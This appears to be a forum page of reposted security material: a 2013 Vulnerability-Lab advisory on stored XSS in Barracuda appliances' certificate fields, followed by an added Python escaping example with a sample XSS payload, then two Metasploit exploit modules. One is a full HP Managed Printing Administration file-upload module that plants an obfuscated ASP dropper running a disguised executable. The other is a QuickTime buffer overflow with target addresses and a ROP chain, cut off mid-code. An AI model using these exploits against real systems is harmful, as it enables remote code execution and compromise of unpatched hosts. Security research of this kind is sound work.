Everything posted by Matt

  1. Author : Vulnerability-Lab
     Source : Barracuda LB, SVF, WAF & WEF - Multiple Vulnerabilities
     Code :

Title:
======
Barracuda LB, SVF, WAF & WEF - Multiple Vulnerabilities

Date:
=====
2013-07-18

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=727

Note: The issue was part of the official Barracuda Networks Bug Bounty Program.

VL-ID:
=====
727

Common Vulnerability Scoring System:
====================================
4.1

Introduction:
=============
The Barracuda Web Filter is an integrated content filtering, application blocking and malware protection solution that is powerful, easy to use and affordable for businesses of all sizes. It enforces Internet usage policies by blocking access to Web sites and Internet applications that are not related to business, and it easily and completely eliminates spyware and other forms of malware from your organization. No more productivity loss trying to repair computers or make computers usable again.

* Blocks access to Web sites based on domain, URL pattern, or content category
* Blocks downloads based on file type
* Blocks applications that access the Internet, including IM, music services, and software update utilities
* Integrates with safe search filters built into popular image search engines
* Provides integrated gateway and desktop spyware protection
* Uses Barracuda Web Security Agents compatible with Windows PCs and Macs to enforce Internet policies on off-network computers

The Barracuda Web Filter combines preventative, reactive, and proactive measures to form a complete Web filtering solution. Designed for the enterprise, the Barracuda Web Filter enables you to set up custom policies for particular users and groups across customizable time ranges. The Barracuda Web Filter integrates with popular LDAP directory servers, such as Microsoft Active Directory, for both authentication and group membership information on which to apply custom policies.

Sample uses of group policies include:

* Restricting access to job board Web sites to only the Human Resources group
* Defining separate policies for teachers and students at a school
* Enabling compliance officers unrestricted access to the Web for investigation
* Providing external instant messaging (e.g., AIM) access only to specific users or groups
* Restricting personal Web browsing to non-working hours

For organizations that do not utilize directory servers, policies can be defined for unauthenticated users as a whole, locally defined users and groups, or network IP address ranges.

(Copy of the Vendor Homepage: http://www.barracudanetworks.com/ns/products/web-filter-overview.php )

The Barracuda Email Security Service is a comprehensive and affordable cloud-based email security service that protects both inbound and outbound email against the latest spam, viruses, worms, phishing and denial of service attacks. Barracuda Email Security Service also includes email encryption and Data Loss Prevention features. The Barracuda Email Security Service leverages advanced security technologies from the industry-leading Barracuda Spam & Virus Firewall and features rich multiple cloud-based protection:

* Rate control and Denial of Service (DoS) protection
* Reputation-based blocking from known spam and malware sources
* Anti-virus, featuring the patent-pending Barracuda Anti-Virus Supercomputing Grid
* Anti-phishing, using the Barracuda Anti-Fraud Intelligence
* Protection against spam, phishing, fraud and emails with other malicious intent
* Custom sender/recipient policy

Comprehensive Protection
Spam and viruses are blocked in the cloud prior to delivery to the customer, saving network bandwidth and providing additional Denial of Service protection. In addition to network bandwidth savings, cloud-based filtering offloads any processing required for spam and virus filtering from the email server. By leveraging the compute capacity available in the cloud, the patent-pending Barracuda Anti-Virus Supercomputing Grid not only detects new outbreaks similar to known viruses, it also identifies new threats for which signatures have never existed.

(Copy of the Vendor Homepage: https://www.barracudanetworks.com/ns/products/bess_overview.php )

The Barracuda Web Application Firewall is a complete and powerful security solution for Web applications and Web sites. The Barracuda Web Application Firewall provides award-winning protection against hackers leveraging protocol or application vulnerabilities to instigate data theft, denial of service or defacement of your Web site.

* Protection against common attacks
* Outbound data theft protection
* Web site cloaking
* Granular policies
* Secure HTTP traffic
* SSL Offloading
* SSL Acceleration
* Load Balancing

The Barracuda Web Application Firewall protects Web applications and Web services from malicious attacks, and can also increase the performance and scalability of these applications. The Barracuda Web Application Firewall offers every capability needed to deliver, secure and manage enterprise Web applications from a single appliance through an intuitive, real-time user interface.

* Single point of protection for inbound and outbound traffic for all Web applications
* Protects Web sites and Web applications against application layer attacks
* Delivers best practices security right out of the box
* Monitors traffic and provides reports about attackers and attack attempts

The Barracuda Web Application Firewall provides award-winning protection from all common attacks on Web applications, including SQL injections, cross-site scripting attacks, session tampering and buffer overflows. Many applications are vulnerable to such attacks because application developers do not consistently employ secure coding practices. Barracuda Web Application Firewall is designed to combat all attack types that have been categorized as significant threats, including:

* Cross Site Scripting (XSS)
* SQL injection flaws
* OS command injections
* Site reconnaissance
* Session hijacking
* Application denial of service
* Malicious probes/crawlers
* Cookie/session tampering
* Path traversal
* Information leakage
...

(Copy of the Vendor Homepage: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php)

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple persistent vulnerabilities in the official Barracuda Product Series of the Load Balancer, Web Firewall, Web Filter and Spam & Virus Firewall.

Report-Timeline:
================
2012-10-18: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2012-10-19: Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program)
2012-10-21: Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty Program)
2013-04-30: Vendor Fix/Patch (Barracuda Networks Developer Team) [Coordination: Dave Farrow]
2013-07-18: Public Disclosure (Vulnerability Laboratory)

Status:
========
Published

Affected Products:
==================
Barracuda Networks
Product: Load Balancer 4.2.0.015 Model 640

Barracuda Networks
Product: Spam & Virus Firewall 5.1.1.006 Model 600

Barracuda Networks
Product: Web Filter 6.0.0.013 Model 910

Barracuda Networks
Product: Web Firewall 7.7.0.020 Model 650

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
Multiple persistent input validation vulnerabilities are detected in the official Barracuda Product Series of the Load Balancer, Web Firewall, Web Filter and Spam & Virus Firewall. The web vulnerabilities allow remote attackers to implement/inject malicious script code on the application side (persistent).

The persistent web vulnerability is located in the certificate management listing module with the bound vulnerable certificate common name, certificate name & service name parameters. The vulnerability can be exploited by customers to execute script code in the certificate management module listing. The remote attackers can import their own generated SSL PEM certificates with a manipulated name, service and certificate common name. The injected script code of the PEM certificate gets executed from the main certificate listing when the malicious stored script code context is processed for display. The bug is located in different sections of the web firewall, load balancer, spam and virus firewall or the new web filter. Affected by the vulnerable input are the Available Certificates, Edit Certificates, Trusted Hosts > Certificates, Saved Certificates and the Save Token Certificate Name listings.

Exploitation of the vulnerabilities requires a low privilege application user account and low or medium user interaction. Successful exploitation of the vulnerabilities can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation of the vulnerability requires low or medium user interaction & a low or medium privilege web application user account.
Vulnerable Module(s):
[+] Web Filter & Web Firewall - Advanced (Extended) > SSL Inspection > Certificate Creation [x] CHECK > Zertifikat Generierung
[+] Spam & Virus - Sicherheitsverwaltung > Konfiguration der SSL-Zertifikate > Trusted (Bestätigt durch CA)
[+] Spam & Virus - Sicherheitsverwaltung > Certificate Signing Request (CSR) > Edit Data Listing
[+] Load Balancer - Zertifikat Generierung (INDEX)

Vulnerable Parameter(s):
[+] Certificate Name
[+] Certificate Service
[+] Certificates - Common Name

Affected Section(s):
[+] Available Certificates - LISTING
[+] Edit Certificates - LISTING
[+] Trusted Hosts > Certificates - LISTING
[+] Saved Certificates - LISTING
[+] Save Token Certificate Name - LISTING

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers with a low or medium privilege application user account and with low or medium user interaction. For demonstration or reproduce ...

Review: Save Token - Certificate Name [index.cgi-save_token-listing]

<tr><td valign="top"><table class="config_module_inner" summary="Config Module" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr class="config_module_tr" id="config_module_row_1">
<td valign="top" width="15"> </td>
<td valign="top" width="200">Certificate</td>
<td valign="top" width="250">[<PERSISTENT MALICIOUS INJECTED SCRIPT CODE!>]</td>
</tr>

Reference(s): (Insert)
http://waf.127.0.0.1:1339/cgi-mod/index.cgi?auth_type=Local&et=1350361913&locale=de_DE&password=5f879645e0954166ac51efe3be737a2a&user=benjamin&primary_tab=BASIC&secondary_tab=server_certs
http://waf.127.0.0.1:1339/cgi-mod/index.cgi?password=5f8796456ac51efe3be737a2a&et=1350361913&primary_tab=BASIC&content_only=1&new_secondary_tab=server_certs&auth_type=Local&user=benjamin&locale=de_DE&secondary_tab=create_certificate_details&ispopup=1&parent_name=server_certs&popup_width=800&popup_height=500

Reference(s): (Affected)
http://waf.127.0.0.1:1339/cgi-mod/index.cgi?password=fb911a7a8bebac208fcab7e79e5&et=1350361362&primary_tab=BASIC&new_secondary_tab=server_certs&serial=50943090&auth_type=Local&locale=de_DE&secondary_tab=save_pkcs_token&content_only=1&index=md5skeqylXIOusxkfzaKf19VQ&user=guest&type=server_cert_external&ispopup=1&parent_name=certificates&popup_width=650&popup_height=200

Review: Available Certificates - Certificate Name [index.cgi-available_certificates-listing]

class="config_module_tr" id="config_module_row_1">
<td valign="top" width="15"> </td>
<td valign="top" width="210"><div id="helpbox"><b class="outlinetop"> <b class="outline1"></b> <b class="outline2"></b> <b class="outline3"></b> <b class="outline4"></b></b>
<div id="contents"><div><[<MALICIOUS PERSISTENT INJECTED SCRIPT CODE!>]"></div></div>

Reference(s): (Insert)
http://webfilter.127.0.0.1:1339/cgi-mod/index.cgi?auth_type=Local&et=1350718546&locale=de_DE&password=0da45d48882cac50687e539e6&primary_tab=ADVANCED&secondary_tab=ssl_certificates&user=benjamin

Reference(s): (Affected)
Sicherheitsverwaltung > Certificate Signing Request (CSR) > Edit Data Listing
http://spam4.127.0.0.1:1339/cgi-mod/index.cgi?password=fb85b10f5d66b87b1194fef&et=1350572565&primary_tab=ADVANCED&content_only=1&new_secondary_tab=ssl&auth_type=Local&user=benjamin&locale=de_DE&secondary_tab=create_csr&ispopup=1&parent_name=ssl&popup_width=900&popup_height=455

Sicherheitsverwaltung > Konfiguration der SSL-Zertifikate > Trusted (Bestätigt durch CA)
http://spam4.127.0.0.1:1339/cgi-mod/index.cgi?&user=benjamin&password=06577ccae825950cd833027d&et=1350572515&auth_type=Local&locale=de_DE&primary_tab=ADVANCED&secondary_tab=ssl

Review: Saved Certificates - Listing (Name)

<td style="width: 220px;"><div style="padding-left:30px"><img src="index.cgi-Dateien/cert.png" align="bottom" border="0">
<a title=""><<MALICIOUS PERSISTENT INJECTED SCRIPT CODE!>;)" <"="">"><<MALICIOUS PERSISTENT INJECTED SCRIPT CODE!>") <</a></div></td>

Reference(s):
(Insert)
Zertifikat Generierung (INDEX)
http://balancer.127.0.0.1:1339/cgi-mod/index.cgi?password=66690cf1f1f6ad9f097e077355a&et=1350476026&primary_tab=BASIC&content_only=3&new_secondary_tab=certificates&auth_type=Local&user=benjamin&locale=de_DE&secondary_tab=create_certificate_details&ispopup=1&parent_name=certificates&popup_width=1000&popup_height=410

PoC as Certificate (PEM):

Solution:
=========
The vulnerabilities can be patched by parsing the affected (displayed) certificate value(s) in the output listing. Restrict and parse the input fields (function) of trusted and self-signed certificate values to prevent future executions out of the certificate context.

Risk:
=====
The security risk of the persistent input validation web vulnerabilities is estimated as high(-).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get permission.

Copyright © 2013 | Vulnerability Laboratory [Evolution Security]

--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
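The listing-side fix that the advisory's Solution section asks for, as an added example in Python (not Barracuda code and not part of the post): parse the subject Name out of an imported certificate's DER, then HTML-escape every attribute value before it is written into a listing row, with an allow-list check for the form's own free-text label fields as defence in depth. The parser, `render_listing_row`, `acceptable_label`, the `encode_name` helper and the sample subject are all constructed here and are assumptions, not the appliance's own code.

```python
import html
import re

# Attribute OIDs a certificate listing typically shows (RFC 5280 short names)
OID_NAMES = {"2.5.4.3": "CN", "2.5.4.6": "C", "2.5.4.7": "L", "2.5.4.8": "ST",
             "2.5.4.10": "O", "2.5.4.11": "OU", "1.2.840.113549.1.9.1": "emailAddress"}
NAME_OIDS = {v: k for k, v in OID_NAMES.items()}
# ASN.1 string tags RFC 5280 allows in a DirectoryString, with the codec for each
STRING_TAGS = {0x0C: "utf-8", 0x13: "ascii", 0x16: "ascii", 0x1E: "utf-16-be"}


def _read_tlv(buf, pos):
    """Read one DER tag-length-value at pos; return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long form: next n bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("truncated DER element")
    return tag, buf[pos:pos + length], pos + length


def _decode_oid(raw):
    """Turn the content octets of an OBJECT IDENTIFIER into dotted form."""
    arcs, val = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:                    # a clear high bit ends the arc
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))


def parse_name(der):
    """Parse a DER X.509 Name (SEQUENCE OF SET OF AttributeTypeAndValue) into
    [(attribute, value), ...]. Unknown value types are rejected, not guessed."""
    tag, rdn_seq, _ = _read_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("Name must be a SEQUENCE")
    attrs, pos = [], 0
    while pos < len(rdn_seq):
        tag, rdn, pos = _read_tlv(rdn_seq, pos)
        if tag != 0x31:
            raise ValueError("RelativeDistinguishedName must be a SET")
        p = 0
        while p < len(rdn):
            tag, atv, p = _read_tlv(rdn, p)
            t_tag, oid_raw, q = _read_tlv(atv, 0)
            v_tag, val_raw, _ = _read_tlv(atv, q)
            if tag != 0x30 or t_tag != 0x06 or v_tag not in STRING_TAGS:
                raise ValueError("malformed AttributeTypeAndValue")
            oid = _decode_oid(oid_raw)
            attrs.append((OID_NAMES.get(oid, oid), val_raw.decode(STRING_TAGS[v_tag])))
    return attrs


def render_listing_row(attrs):
    """Build the listing <tr>. Every value is HTML-escaped on output, so markup
    carried in a subject field is displayed as text instead of being executed."""
    cells = "".join("<td>%s</td><td>%s</td>" % (html.escape(k), html.escape(v))
                    for k, v in attrs)
    return "<tr>" + cells + "</tr>"


SAFE_LABEL = re.compile(r"^[\w .,()/@:+=-]{1,64}$")

def acceptable_label(value):
    """Defence in depth for the import form's own fields (certificate name,
    service): short, and limited to characters a label legitimately needs."""
    return bool(SAFE_LABEL.match(value))


def encode_name(attrs):
    """DER-encode a Name with one UTF8String attribute per RDN. A hypothetical
    helper used only to construct the sample subject below."""
    def tlv(tag, body):
        if len(body) < 0x80:
            return bytes([tag, len(body)]) + body
        lb = len(body).to_bytes((len(body).bit_length() + 7) // 8, "big")
        return bytes([tag, 0x80 | len(lb)]) + lb + body

    def oid(dotted):
        arcs = [int(a) for a in dotted.split(".")]
        out = bytearray([arcs[0] * 40 + arcs[1]])
        for a in arcs[2:]:
            chunk, a = [a & 0x7F], a >> 7
            while a:                        # base-128, high bit set on all but the last
                chunk.append(0x80 | (a & 0x7F))
                a >>= 7
            out += bytes(reversed(chunk))
        return tlv(0x06, bytes(out))

    rdns = b"".join(tlv(0x31, tlv(0x30, oid(NAME_OIDS[k]) + tlv(0x0C, v.encode("utf-8"))))
                    for k, v in attrs)
    return tlv(0x30, rdns)


# Constructed sample: a subject whose CN carries markup, as an imported self-signed
# certificate can (the advisory's PoC embeds script in exactly these fields).
SAMPLE_SUBJECT_DER = encode_name([("C", "DE"), ("O", "Example Org"),
    ("CN", "<img src=x onerror=alert(1)> cert"), ("emailAddress", "admin@example.invalid")])
```

`parse_name` only understands the string types a Name may legally carry; anything else is a parse error, which is the right outcome for an appliance that should refuse, not render, a certificate it cannot interpret.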
  2. Author : metasploit
     Source : HP Managed Printing Administration jobAcct Remote Command Execution
     Code :

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize
    super(
      'Name'           => 'HP Managed Printing Administration jobAcct Remote Command Execution',
      'Description'    => %q{
          This module exploits an arbitrary file upload vulnerability on HP Managed
        Printing Administration 2.6.3 (and before). The vulnerability exists in the
        UploadFiles() function from the MPAUploader.Uploader.1 control, loaded and used
        by the server. The function can be abused via directory traversal and null byte
        injection in order to achieve arbitrary file upload. In order to exploit
        successfully, a few conditions must be met:

        1) A writable location under the context of Internet Guest Account (IUSR_*),
           or Everyone is required. By default, this module will attempt to write to
           /hpmpa/userfiles/, but you may specify the WRITEWEBFOLDER datastore option
           to provide another writable path.
        2) The writable path must also be readable by a browser, this typically means
           a location under wwwroot.
        3) You cannot overwrite a file with the same name as the payload.
      },
      'Author'         =>
        [
          'Andrea Micalizzi', # aka rgod - Vulnerability Discovery
          'juan vazquez'      # Metasploit module
        ],
      'Platform'       => 'win',
      'References'     =>
        [
          ['CVE', '2011-4166'],
          ['OSVDB', '78015'],
          ['BID', '51174'],
          ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-352/'],
          ['URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03128469']
        ],
      'Targets'        =>
        [
          [ 'HP Managed Printing Administration 2.6.3 / Microsoft Windows [XP SP3 | Server 2003 SP2]', { } ],
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'DisclosureDate' => 'Dec 21 2011'
    )

    register_options(
      [
        OptString.new('WRITEWEBFOLDER', [ false, "Additional Web location with file write permissions for IUSR_*" ])
      ], self.class)
  end

  def peer
    return "#{rhost}:#{rport}"
  end

  def webfolder_uri
    begin
      u = datastore['WRITEWEBFOLDER']
      u = "/" if u.nil? or u.empty?
      URI(u).to_s
    rescue ::URI::InvalidURIError
      print_error "Invalid URI: #{datastore['WRITEWEBFOLDER'].inspect}"
      return "/"
    end
  end

  def to_exe_asp(exes = '')
    var_func      = Rex::Text.rand_text_alpha(rand(8)+8)
    var_stream    = Rex::Text.rand_text_alpha(rand(8)+8)
    var_obj       = Rex::Text.rand_text_alpha(rand(8)+8)
    var_shell     = Rex::Text.rand_text_alpha(rand(8)+8)
    var_tempdir   = Rex::Text.rand_text_alpha(rand(8)+8)
    var_tempexe   = Rex::Text.rand_text_alpha(rand(8)+8)
    var_basedir   = Rex::Text.rand_text_alpha(rand(8)+8)
    var_f64name   = Rex::Text.rand_text_alpha(rand(8)+8)
    arg_b64string = Rex::Text.rand_text_alpha(rand(8)+8)
    var_length    = Rex::Text.rand_text_alpha(rand(8)+8)
    var_out       = Rex::Text.rand_text_alpha(rand(8)+8)
    var_group     = Rex::Text.rand_text_alpha(rand(8)+8)
    var_bytes     = Rex::Text.rand_text_alpha(rand(8)+8)
    var_counter   = Rex::Text.rand_text_alpha(rand(8)+8)
    var_char      = Rex::Text.rand_text_alpha(rand(8)+8)
    var_thisdata  = Rex::Text.rand_text_alpha(rand(8)+8)
    const_base64  = Rex::Text.rand_text_alpha(rand(8)+8)
    var_ngroup    = Rex::Text.rand_text_alpha(rand(8)+8)
    var_pout      = Rex::Text.rand_text_alpha(rand(8)+8)

    vbs = "<%\r\n"

    # ASP Base64 decode from Antonin Foller http://www.motobit.com/tips/detpg_base64/
    vbs << "Function #{var_f64name}(ByVal #{arg_b64string})\r\n"
    vbs << "Const #{const_base64} = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\r\n"
    vbs << "Dim #{var_length}, #{var_out}, #{var_group}\r\n"
    vbs << "#{arg_b64string} = Replace(#{arg_b64string}, vbCrLf, \"\")\r\n"
    vbs << "#{arg_b64string} = Replace(#{arg_b64string}, vbTab, \"\")\r\n"
    vbs << "#{arg_b64string} = Replace(#{arg_b64string}, \" \", \"\")\r\n"
    vbs << "#{var_length} = Len(#{arg_b64string})\r\n"
    vbs << "If #{var_length} Mod 4 <> 0 Then\r\n"
    vbs << "Exit Function\r\n"
    vbs << "End If\r\n"
    vbs << "For #{var_group} = 1 To #{var_length} Step 4\r\n"
    vbs << "Dim #{var_bytes}, #{var_counter}, #{var_char}, #{var_thisdata}, #{var_ngroup}, #{var_pout}\r\n"
    vbs << "#{var_bytes} = 3\r\n"
    vbs << "#{var_ngroup} = 0\r\n"
    vbs << "For #{var_counter} = 0 To 3\r\n"
    vbs << "#{var_char} = Mid(#{arg_b64string}, #{var_group} + #{var_counter}, 1)\r\n"
    vbs << "If #{var_char} = \"=\" Then\r\n"
    vbs << "#{var_bytes} = #{var_bytes} - 1\r\n"
    vbs << "#{var_thisdata} = 0\r\n"
    vbs << "Else\r\n"
    vbs << "#{var_thisdata} = InStr(1, #{const_base64}, #{var_char}, vbBinaryCompare) - 1\r\n"
    vbs << "End If\r\n"
    vbs << "If #{var_thisdata} = -1 Then\r\n"
    vbs << "Exit Function\r\n"
    vbs << "End If\r\n"
    vbs << "#{var_ngroup} = 64 * #{var_ngroup} + #{var_thisdata}\r\n"
    vbs << "Next\r\n"
    vbs << "#{var_ngroup} = Hex(#{var_ngroup})\r\n"
    vbs << "#{var_ngroup} = String(6 - Len(#{var_ngroup}), \"0\") & #{var_ngroup}\r\n"
    vbs << "#{var_pout} = Chr(CByte(\"&H\" & Mid(#{var_ngroup}, 1, 2))) + _\r\n"
    vbs << "Chr(CByte(\"&H\" & Mid(#{var_ngroup}, 3, 2))) + _\r\n"
    vbs << "Chr(CByte(\"&H\" & Mid(#{var_ngroup}, 5, 2)))\r\n"
    vbs << "#{var_out} = #{var_out} & Left(#{var_pout}, #{var_bytes})\r\n"
    vbs << "Next\r\n"
    vbs << "#{var_f64name} = #{var_out}\r\n"
    vbs << "End Function\r\n"

    vbs << "Sub #{var_func}()\r\n"
    vbs << "#{var_bytes} = #{var_f64name}(\"#{Rex::Text.encode_base64(exes)}\")\r\n"
    vbs << "Dim #{var_obj}\r\n"
    vbs << "Set #{var_obj} = CreateObject(\"Scripting.FileSystemObject\")\r\n"
    vbs << "Dim #{var_stream}\r\n"
    vbs << "Dim #{var_tempdir}\r\n"
    vbs << "Dim #{var_tempexe}\r\n"
    vbs << "Dim #{var_basedir}\r\n"
    vbs << "Set #{var_tempdir} = #{var_obj}.GetSpecialFolder(2)\r\n"
    vbs << "#{var_basedir} = #{var_tempdir} & \"\\\" & #{var_obj}.GetTempName()\r\n"
    vbs << "#{var_obj}.CreateFolder(#{var_basedir})\r\n"
    vbs << "#{var_tempexe} = #{var_basedir} & \"\\\" & \"svchost.exe\"\r\n"
    vbs << "Set #{var_stream} = #{var_obj}.CreateTextFile(#{var_tempexe},2,0)\r\n"
    vbs << "#{var_stream}.Write #{var_bytes}\r\n"
    vbs << "#{var_stream}.Close\r\n"
    vbs << "Dim #{var_shell}\r\n"
    vbs << "Set #{var_shell} = CreateObject(\"Wscript.Shell\")\r\n"
    vbs << "#{var_shell}.run #{var_tempexe}, 0, false\r\n"
    vbs << "End Sub\r\n"
    vbs << "#{var_func}\r\n"
    vbs << "%>\r\n"

    vbs
  end

  def upload(contents, location)
    post_data = Rex::MIME::Message.new
    post_data.add_part("upload", nil, nil, "form-data; name=\"upload\"")
    post_data.add_part(contents, "application/octet-stream", "binary", "form-data; name=\"uploadfile\"; filename=\"..\\../../wwwroot#{location}\x00.tmp\"")
    data = post_data.to_s
    data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")

    res = send_request_cgi({
      'uri'           => normalize_uri("hpmpa", "jobAcct", "Default.asp"),
      'method'        => 'POST',
      'ctype'         => "multipart/form-data; boundary=#{post_data.bound}",
      'data'          => data,
      'encode_params' => false,
      'vars_get'      => {
        'userId' => rand_text_numeric(2+rand(2)),
        'jobId'  => rand_text_numeric(2+rand(2))
      }
    })

    return res
  end

  def check
    res = send_request_cgi({'uri' => normalize_uri("hpmpa", "home", "Default.asp")})

    version = nil
    if res and res.code == 200 and res.body =~ /HP Managed Printing Administration/ and res.body =~ /<dd>v(.*)<\/dd>/
      version = $1
    else
      return Exploit::CheckCode::Safe
    end

    vprint_status("HP MPA Version Detected: #{version}")
    if version <= "2.6.3"
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    # Generate the ASP containing the EXE containing the payload
    exe = generate_payload_exe
    # Not using Msf::Util::EXE.to_exe_asp because the generated vbs is too long and the app complains
    asp = to_exe_asp(exe)

    #
    # UPLOAD
    #
    asp_name = "#{rand_text_alpha(5+rand(3))}.asp"
    locations = [
      "/hpmpa/userfiles/images/printers/",
      "/hpmpa/userfiles/images/backgrounds/",
      "/hpmpa/userfiles/images/",
      "/hpmpa/userfiles/",
      "/"
    ]
    locations << normalize_uri(webfolder_uri, asp_name) if datastore['WRITEWEBFOLDER']

    payload_url = ""
    locations.each {|location|
      asp_location = location + asp_name
      print_status("#{peer} - Uploading #{asp.length} bytes to #{location}...")
      res = upload(asp, asp_location)
      if res and res.code == 200 and res.body =~ /Results of Upload/ and res.body !~ /Object\[formFile\]/
        print_good("#{peer} - ASP Payload successfully wrote to #{location}")
        payload_url = asp_location
        break
      elsif res and res.code == 200 and res.body =~ /Results of Upload/ and res.body =~ /Object\[formFile\]/
        print_error("#{peer} - Error probably due to permissions while writing to #{location}")
      else
        print_error("#{peer} - Unknown error while writing to #{location}")
      end
    }

    if payload_url.empty?
      fail_with(Exploit::Failure::NotVulnerable, "#{peer} - Failed to upload ASP payload to the target")
    end

    #
    # EXECUTE
    #
    print_status("#{peer} - Executing payload through #{payload_url}...")
    send_request_cgi({ 'uri' => payload_url})
  end
end
  3. Author : metasploit Source : http://www.exploit-db.com/exploits/27012/ Vulnerable App : Link Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "Apple Quicktime 7 Invalid Atom Length Buffer Overflow", 'Description' => %q{ This module exploits a vulnerability found in Apple Quicktime. The flaw is triggered when Quicktime fails to properly handle the data length for certain atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer overflow by loading a specially crafted .mov file, and allows arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jason Kratzer', # Original Discovery & PoC (overlapped finding), aka pyoor 'Tom Gallagher', # Original Discovery (overlapped) 'Paul Bates', # Original Discovery (overlapped) 'sinn3r' # Metasploit ], 'References' => [ [ 'CVE', '2013-1017' ], [ 'BID', '60097' ], [ 'URL', 'http://support.apple.com/kb/HT5770' ] ], 'Platform' => 'win', 'Targets' => [ # All of the following addresses are from Quicktime.qts # RET = ADD ESP,280; RET, Nop = RET, Pop = POP ESP; RET [ 'Quicktime 7.7.3 with IE 8 on Windows XP SP3', {'Ret' => 0x66923467, 'Nop' => 0x6692346d, 'Pop' => 0x66849239} ], [ 'Quicktime 7.7.2 with IE 8 on Windows XP SP3', {'Ret' => 0x669211C7, 'Nop' => 0x669211CD, 'Pop' => 0x668C5B55} ], [ 'Quicktime 7.7.1 with IE 8 on Windows XP SP3', {'Ret' => 0x66920D67, 'Nop' => 0x66920D6D, 'Pop' => 0x66849259} ], [ 'Quicktime 7.7.0 with IE 8 on Windows XP SP3', {'Ret' => 0x66920BD7, 'Nop' => 0x66920BDD, 'Pop' => 0x668E963A} ] ], 'Payload' => { 'BadChars' => "\x00" # js_property_spray 
no like nilz },
      'DefaultOptions' =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Privileged'     => false,
      'DisclosureDate' => "May 22 2013"
    ))
  end

  def get_payload(t)
    p = ''
    rop = [
      0x77c1e844, # POP EBP # RETN [msvcrt.dll]
      0x77c1e844, # skip 4 bytes [msvcrt.dll]
      0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
      0xffffffff,
      0x77c127e5, # INC EBX # RETN [msvcrt.dll]
      0x77c127e5, # INC EBX # RETN [msvcrt.dll]
      0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
      0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
      0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
      0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
      0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
      0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
      0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
      0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
      0x77c3048a, # POP EDI # RETN [msvcrt.dll]
      0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
      0x77c46efb, # POP ESI # RETN [msvcrt.dll]
      0x77c2aacc, # JMP [EAX] [msvcrt.dll]
